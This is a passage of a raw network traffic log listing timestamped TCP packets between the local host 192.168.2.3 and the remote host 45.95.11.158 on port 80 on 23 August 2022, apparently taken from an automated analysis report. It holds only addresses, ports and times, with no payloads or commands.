Aug 23, 2022 18:23:57.417493105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417505026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417512894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417529106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417538881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417552948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417572975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417589903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417591095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417593956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417598963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417613983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417618036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417635918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417639017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417659998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417660952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417676926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.417679071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417709112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.417725086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.441605091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.441638947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.441663027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.441680908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.441682100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.441711903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.441746950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.447958946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448040009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448069096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448086023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448096991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.448107004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448131084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448132992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.448157072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448173046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.448184967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.448208094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.448236942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.449378014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.449409962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.449434996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.449446917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.449450970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.449472904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.449501991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.449532986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.450546026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.450577974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.450603008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.450619936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.450648069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.450706959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.451412916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.451442957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.451467037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.451482058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.451482058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.451515913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.451541901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.452367067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.452397108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.452421904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.452438116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.452440023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.452466965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.452502012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.453167915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.453197002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.453218937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.453227997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.453234911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.453247070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.453263044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.453277111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454050064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454081059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454104900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454111099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454122066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454122066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454149008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454159021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454359055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454385996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454410076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454422951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454437017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.454437017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454464912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.454487085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.455665112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455694914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455719948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455737114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455740929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.455754042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.455771923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.455946922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455974102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.455993891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.455996037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456012011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456022024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456046104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456052065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456068993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456094027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456110001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456116915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456132889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.456134081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456161976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.456173897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457456112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457487106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457510948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457525969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457532883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457545996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457556963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457580090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457592964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457597017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457597971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457611084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457619905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457619905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457634926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457644939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457667112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457670927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457689047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457700968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457732916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457899094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457926035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457947969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457954884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457964897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.457974911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.457992077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458040953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458045006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458085060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458089113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458110094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458127022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458148956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458158970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458182096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458204031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458204985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458229065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458244085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458247900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458266020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458326101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458353996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458367109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458369970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458391905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458393097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458408117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458425999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458432913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458456993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458472967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458472967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458494902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458498001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458508015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458535910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458702087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458730936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458746910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.458750963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458770037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.458781958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482355118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482391119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482414961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482431889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482476950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482500076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482526064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482551098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482559919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482568026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482574940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482590914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482603073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482613087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482618093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482636929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482636929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482657909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482661963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482673883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.482678890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.482712984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.483308077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.483340025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.483366966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.483377934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.483381033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.483390093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.483398914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.483422995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.483441114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485240936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485271931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485296965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485313892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485315084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485336065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485342979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485359907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485383034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485383987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485400915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.485409021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485413074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485433102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.485465050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.486006975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.486037970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.486063004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.486079931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.486083031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.486112118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.486143112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.488442898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.488473892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.488490105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.488496065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.488512993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.488518000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.488563061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.489170074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.493649960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.493688107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.493724108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.493763924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.493886948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.493907928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.493947983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.494638920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496390104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496422052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496438980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496476889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496511936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496519089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496606112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496630907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496649981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.496654034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496679068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.496756077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.497209072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.497268915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516516924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516554117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516586065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516602993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516630888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516654968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516673088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516716957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516719103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516741037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516766071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516769886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516793966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516819954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516824007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516865969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516875029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516921043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.516949892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516989946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.516992092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517035961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517076969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.517127991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517395973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.517452002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517472982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.517515898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517518997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.517544031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.517559052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.517585993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519267082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519296885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519315958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519376993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519439936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519443035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519493103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519503117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519557953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519599915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519623995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519649029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519701958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519702911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519707918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519733906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519742966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.519748926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.519784927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.522325039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.522358894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.522384882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.522397995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.522406101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.522413015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.522424936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.522444963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.522964001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.523019075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.528245926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.528315067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.528327942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.528362036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.528398991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.528423071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.528450012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.528462887 CEST	49827	80	192.168.2.3	45.95.11.158
